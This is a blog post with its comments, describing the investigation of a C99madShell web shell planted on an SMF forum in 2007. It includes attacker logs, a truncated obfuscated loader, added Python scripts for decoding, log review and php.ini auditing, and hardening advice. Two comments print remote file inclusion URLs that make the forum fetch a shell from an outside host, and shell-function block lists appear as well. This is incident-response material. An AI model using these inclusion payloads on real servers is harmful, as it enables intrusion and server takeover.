All Your SMF Forums Have Been Hacked. Have a Nice Day.

There is nothing quite like innocently checking over your httpd logs, attempting to figure out why the ‘preview’ feature of your forum s/w has stopped working [stuck on 'fetching preview...'], only to come upon this…

--09:57:23--  http://kotzilla.jino-net.ru/include.txt
           => `include.txt'
Resolving kotzilla.jino-net.ru... 217.107.217.29
Connecting to kotzilla.jino-net.ru|217.107.217.29|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44,348 (43K) [text/plain]

    0K .......... .......... .......... .......... ...       100%   69.60 KB/s

09:57:25 (69.60 KB/s) - `include.txt' saved [44348/44348]

For those who do not know, the above is wget (or the equivalent) being used to download a script onto your system, all of it done through Apache, and usually triggered by a single URL crafted to exploit a weakness in the given application.

My journey starts here.

Step 1.

find / -name include.txt

Nothing. The intruder must have deleted or renamed it.

Step 2.
Check http://kotzilla.jino-net.ru/include.txt for clues.

<?PHP
             //Authentication
$login = ""; //Login
$pass = "";  //Pass
$md5_pass = ""; //If no pass then hash
eval(gzinflate(base64_decode('HJ3HkqN...[removed]...f/79z/8A')));
?>

Intruder must think this is clever. Once you decode and inflate the string, it returns…

eval(gzinflate(base64_decode('[another string to decode and inflate]')));

Step 3.
We do not want to execute any unknown PHP code. The only option left is to write a PHP script that decodes and inflates, layer by layer, until we get to the center…

<?php
// Peel off every eval(gzinflate(base64_decode('...'))) layer without executing any of it.
// Each iteration decodes and inflates one layer and feeds the result back into the loop.
$string = "eval(gzinflate(base64_decode('HJ3HkqN...[removed]...f/79z/8A')));";
$pattern = "/^eval\(gzinflate\(base64_decode\('([^']*)'\)\)\);/";
$count = 0;
while (preg_match($pattern, $string, $matches)) {
    $count++;
    $string = gzinflate(base64_decode($matches[1]));
}
echo "Decoded/Inflated: $count\n";
echo $string;
?>

It seems to be some type of PHP web shell script called C99madShell.

Step 4.
We need to locate the downloaded script…

find / -name '*.php' | xargs grep 'eval(gzinflate(base64_decode('
/.../forums.devside.net/Themes/readme.php:eval(gzinflate(base64_decode('HJ3Hkq...

Not good!
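The same job as Steps 3 and 4, written as an added example in Python rather than the post's own PHP: it walks a directory for .php files carrying the eval(gzinflate(base64_decode())) pattern and peels the layers without ever executing the decoded code. PHP's gzinflate() reads raw DEFLATE, which is zlib with wbits=-15. The nested sample file, the placeholder innermost payload and the indicator list are constructed for the demo; the shell family name comes from the post and the function names from the php.ini advice in the comments.

```python
import base64
import os
import re
import tempfile
import zlib

# Constructed stand-in for the innermost payload. It is NOT a shell: it only
# carries the C99madShell name so the indicator check below has something to find.
INNER_PHP = "<?php /* constructed sample standing in for C99madShell */ echo 'hello'; ?>"

# One obfuscation layer as seen in include.txt: eval(gzinflate(base64_decode('...')))
LAYER_RE = re.compile(r"eval\(gzinflate\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)\)")

# Strings worth flagging in a decoded file (case-insensitive match).
INDICATORS = ("c99madshell", "exec(", "passthru(", "shell_exec(", "system(", "proc_open(", "popen(")


def wrap_layer(php_source: str) -> str:
    """Wrap php_source in one eval(gzinflate(base64_decode())) layer.

    wbits=-15 produces raw DEFLATE, which is what PHP's gzinflate() expects.
    Only used here to build a realistic test input.
    """
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = comp.compress(php_source.encode()) + comp.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(raw).decode()


def build_sample(layers: int = 3) -> str:
    """Constructed sample file: decoy assignments first, then the nested layers."""
    body = INNER_PHP
    for _ in range(layers):
        body = wrap_layer(body)
    return '<?php\n$login = "";\n$pass = "";\n' + body + "\n?>"


def unwrap(source: str, max_layers: int = 50):
    """Peel eval(gzinflate(base64_decode())) layers without executing anything.

    Returns (layers_removed, innermost_source). max_layers bounds the loop so a
    file that keeps re-wrapping itself cannot spin forever.
    """
    layers = 0
    while layers < max_layers:
        m = LAYER_RE.search(source)
        if not m:
            break
        # -15 = raw DEFLATE, the inverse of PHP's gzinflate()
        source = zlib.decompress(base64.b64decode(m.group(1)), -15).decode("utf-8", "replace")
        layers += 1
    return layers, source


def indicators(php_source: str):
    """Return the INDICATORS present in php_source."""
    low = php_source.lower()
    return [name for name in INDICATORS if name in low]


def scan_tree(root: str):
    """Find *.php files under root containing the layered-eval pattern and decode each.

    Returns sorted (relative path, layers_removed, indicators_found) tuples: the
    find | xargs grep of Step 4 with the decoding folded in.
    """
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if LAYER_RE.search(text):
                layers, inner = unwrap(text)
                results.append((os.path.relpath(path, root), layers, indicators(inner)))
    return sorted(results)


def demo_scan():
    """Build a throwaway tree shaped like the hit on the page (Themes/readme.php) and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "Themes"))
        with open(os.path.join(root, "Themes", "readme.php"), "w") as fh:
            fh.write(build_sample(3))
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php echo 'clean'; ?>")
        return scan_tree(root)


if __name__ == "__main__":
    for path, layers, found in demo_scan():
        print("%s: %d layers removed, indicators %s" % (path, layers, found))
```

Run it against the document root instead of the temporary tree by calling scan_tree("/path/to/forum"); the regex only catches this one wrapper shape, so a file that uses str_rot13 or a different decoder chain still needs a human look.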

[Screenshot: Hack Shell 1]

[Screenshot: Hack Shell 2]

Step 5.
Check logs.

grep 'readme.php' /.../forums.devside.net/access_log

The intruder was up to no good.

149.156.204.1 - - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [26/Sep/2007:09:58:00 -0400] "POST /Themes/readme.php HTTP/1.1" 200 3501 "http://forums.devside.net/Themes/readme.php" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [27/Sep/2007:13:08:03 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4366 "-" "GoogleBotv2"
149.156.204.1 - - [27/Sep/2007:13:09:24 -0400] "POST /Themes/readme.php HTTP/1.1" 200 4980 "http://forums.devside.net/Themes/readme.php" "GoogleBotv2"
...

Final Analysis.
I’ve searched the logs, and I cannot locate anything helpful about the exploit. It does not seem to be an exploit in a URL; maybe it is POST related, or has something to do with the SMF theme function. I run no mods, use the default theme, and do not allow users to switch themes.

The latest SMF 1.1.4 changelog does not state anything about fixed exploits.

I know the IP of the intruder [I'm sure just a hijacked system], the user_id on the forum, and the mail account used for activation, but not much else.

resolveip 149.156.204.1
Host name of 149.156.204.1 is nzs.agh.edu.pl
149.156.204.1 - - [26/Sep/2007:09:52:58 -0400] "GET /index.php?action=activate;u=1992;code=136bd7eb0f HTTP/1.1" 200 3409 "http://www.qcsalabama.com/mail/src/read_body.php?mailbox=INBOX&passed_id=685&startMessage=1" "Opera/9.21 (Windows NT 5.1; U; ru)"

Checking the forum account, I see this user has also logged in via another IP [and this might be where the exploit starts]…

83.219.135.75 - - [26/Sep/2007:09:48:07 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=+%22powered+by+smf+1.1.3%22+site%3Anet&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
...
83.219.135.75 - - [26/Sep/2007:09:57:07 -0400] "POST //index.php?action=login2 HTTP/1.1" 302 851 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:09 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:11 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 1527 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:23 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 307 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
resolveip 83.219.135.75
Host name of 83.219.135.75 is ppp135-75.tis-dialog.ru
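The log work in Step 5 and above, as an added example (not part of the original post): a small Apache combined-log parser run over the lines quoted on this page, reassembled where extraction wrapped them. It pulls out three things a defender wants from this evidence: requests for .php files that are not a known entry point (the readme.php hits), visitors who arrived from a search-engine query for a "powered by" string (version hunting), and a per-IP timeline. The allow-list of entry points is an assumption for the demo; a real one comes from the install.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs, urlparse

# Apache combined log: ip ident user [time] "method url proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Sample log: the access_log lines quoted in the post, in time order.
SAMPLE_LOG = """\
83.219.135.75 - - [26/Sep/2007:09:48:07 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=+%22powered+by+smf+1.1.3%22+site%3Anet&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
149.156.204.1 - - [26/Sep/2007:09:52:58 -0400] "GET /index.php?action=activate;u=1992;code=136bd7eb0f HTTP/1.1" 200 3409 "http://www.qcsalabama.com/mail/src/read_body.php?mailbox=INBOX&passed_id=685&startMessage=1" "Opera/9.21 (Windows NT 5.1; U; ru)"
83.219.135.75 - - [26/Sep/2007:09:57:07 -0400] "POST //index.php?action=login2 HTTP/1.1" 302 851 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:09 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:11 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 1527 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:23 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 307 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
149.156.204.1 - - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [26/Sep/2007:09:58:00 -0400] "POST /Themes/readme.php HTTP/1.1" 200 3501 "http://forums.devside.net/Themes/readme.php" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [27/Sep/2007:13:08:03 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4366 "-" "GoogleBotv2"
149.156.204.1 - - [27/Sep/2007:13:09:24 -0400] "POST /Themes/readme.php HTTP/1.1" 200 4980 "http://forums.devside.net/Themes/readme.php" "GoogleBotv2"
"""

# Assumption for the demo: the only PHP file a visitor should ever request directly.
ALLOWED_SCRIPTS = frozenset({"/index.php"})


def parse_line(line: str):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["time"] = datetime.strptime(e["time"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    # Path without the query string, with repeated slashes collapsed so that
    # "//index.php" (the login2 request) compares equal to "/index.php".
    e["path"] = re.sub(r"/+", "/", e["url"].split("?", 1)[0])
    return e


def parse_log(text: str):
    return [e for e in (parse_line(line) for line in text.splitlines()) if e]


def unexpected_php(entries, allowed=ALLOWED_SCRIPTS):
    """Requests for .php files that are not a known entry point: dropped files show up here."""
    return [e for e in entries if e["path"].endswith(".php") and e["path"] not in allowed]


def search_referers(entries):
    """(ip, query) for hits that arrived from a search results page.

    A query such as "powered by smf 1.1.3" shows the visitor was hunting for a version.
    """
    out = []
    for e in entries:
        ref = urlparse(e["referer"])
        query = parse_qs(ref.query)
        if ref.path.endswith("/search") and "q" in query:
            out.append((e["ip"], query["q"][0].strip()))
    return out


def timeline(entries, ip: str):
    """(timestamp, method, url) for one client, oldest first."""
    return [
        (e["time"].isoformat(), e["method"], e["url"])
        for e in sorted(entries, key=lambda e: e["time"])
        if e["ip"] == ip
    ]


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    for e in unexpected_php(entries):
        print("unexpected script:", e["ip"], e["method"], e["path"], e["status"])
    for ip, q in search_referers(entries):
        print("search-engine arrival:", ip, repr(q))
    for row in timeline(entries, "83.219.135.75"):
        print(*row)
```

Feed it the real access_log with parse_log(open(path).read()); the entry-point allow-list is the part to adjust per install, and anything it flags under a directory that should only hold templates (Themes/, Sources/) is worth a look regardless of status code.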

I can understand phpBB getting rooted, I can understand WordPress being owned, but this is a first for SMF.

And for anyone having odd issues with SMF [like getting stuck on 'fetching preview...']…

Smile. All your SMF forums have been hacked. Have a nice day.

Search ‘fetching preview’ on the SMF support forums. This hack/exploit might be going back years.

17 thoughts on “All Your SMF Forums Have Been Hacked. Have a Nice Day.”

  1. Here are some steps that I have taken to block these types of attacks…

    Edit php.ini

    allow_url_fopen = Off
    disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
    

    The last 2-4 functions are not specific to these ‘get system shell’ type of attacks, but should be included unless you need them.
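An added example (not from the comment's author) that checks a php.ini against the two settings recommended above: it parses the file, reports allow_url_fopen if it is not Off, and lists any function from the comment's disable_functions line that is missing. The two sample php.ini fragments are constructed for the demo.

```python
# Functions the comment above says to disable; copied from its disable_functions line.
REQUIRED_DISABLED = {
    "exec", "passthru", "shell_exec", "system", "proc_open", "popen",
    "curl_exec", "curl_multi_exec", "parse_ini_file", "show_source",
}

# Constructed samples: a shipped-default style file and a hardened one.
WEAK_INI = """\
; constructed sample php.ini
[PHP]
allow_url_fopen = On
disable_functions =
"""
HARDENED_INI = """\
[PHP]
allow_url_fopen = Off
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
"""


def parse_php_ini(text: str):
    """Minimal php.ini reader: strips ';' comments and [sections], last assignment wins."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def audit(text: str):
    """Return findings as strings; empty when the file matches the advice above."""
    s = parse_php_ini(text)
    findings = []
    # PHP's built-in default for allow_url_fopen is On, so a missing key counts as On.
    fopen = s.get("allow_url_fopen", "On")
    if fopen.lower() not in ("off", "0", ""):
        findings.append("allow_url_fopen is %s; set it to Off" % fopen)
    disabled = {f.strip() for f in s.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(REQUIRED_DISABLED - disabled)
    if missing:
        findings.append("disable_functions is missing: " + ",".join(missing))
    return findings


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, audit(ini) or ["ok"])
```

This reads one file, so compare its verdict with what the running interpreter actually reports (php -i, or ini_get() from a test page), since the web server's own configuration can set these directives too.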

  2. And just to clarify some points, the correlation between the ‘fetching preview…’ problem and this hack is low. Just because you are having similar issues does not mean you have been hacked.

  3. I was thinking about using SMF, as I’ve grown weary with phpBB3, but after seeing this, maybe I’ll just go with punBB.

  4. Every software has had security issues. If they haven’t it is just because it hasn’t happened yet.

    Anyway, this particular issue appears to be related to a bug that was fixed in the latest 1.0 and 1.1 releases.

  5. We had the same issue as well.

    The suspicious readme.php file was on the root path of SMF, not the themes folder. So I guess it’s not related to themes.

    We’ve added the php security controls you mentioned and now we wait.

    Thanks for your insights man. ;)

  6. I have been using SMF for something like a year, and the real problem I find with it is that some mods make the code crash sometimes, but at its origin it is a good forum; the Simple Machines team do their best to give us a free solution.

  7. Hey,

    I have read the article very, very carefully because I’m thinking of having SMF installed as a forum on one of my accounts. Do you think that it is not safer than any other Open Source freeware forum software?

  8. The C99madShell is a common exploit script used against any system which allows attachments or uploads. Make sure that you do not allow uploads with php* extensions to any of your systems, or you leave yourself open to this attack, which can be used to root your server or to make your server attack other servers.

  9. A few things I would like to clear up: the shell is encoded with base64 to get round mod_security. Now I know this is an OLD blog post, but I think he exploited a remote file inclusion exploit in the themes directory (that’s why he opened the readme). The exploit is:

    /Sources/Themes.php?settings[theme_dir]=http://bilmemne.siz/c99.txt?

    Now there’s no official patch for this yet, but the exploit should be unable to work if you have register_globals enabled.

  10. Retarded script-kiddies are trying this on old versions of SMF…

    thedomain.com/index.php?action=http_full_url_to_txt_with_php_inside

  11. So what do we do, delete the forums?? Is this serious, like getting your info like credit card number, address of your house and stuff?? Please let me know asap.

    Thanks

  12. I have just installed the latest update of SMF (version 1.1.5), but after reading about this vulnerability I am quite worried :(

    How much safer can the latest version of SMF be compared to other open source forum software? I really like SMF & I do think that it is a good and flexible forum, especially for people like me who don’t know programming!

  13. Hi Folks!

    Just wanted to share my new experience.

    If your Windows XP refuses to start due to an error about a missing HAL.DLL, an invalid Boot.ini or any other important system boot file, you can repair this by using the XP installation CD. Simply boot from your XP Setup CD and enter the Recovery Console. Then run “attrib -H -R -S” on the C:\Boot.ini file and delete it. Run “Bootcfg /Rebuild” and then Fixboot.

    Regards,
    Carl
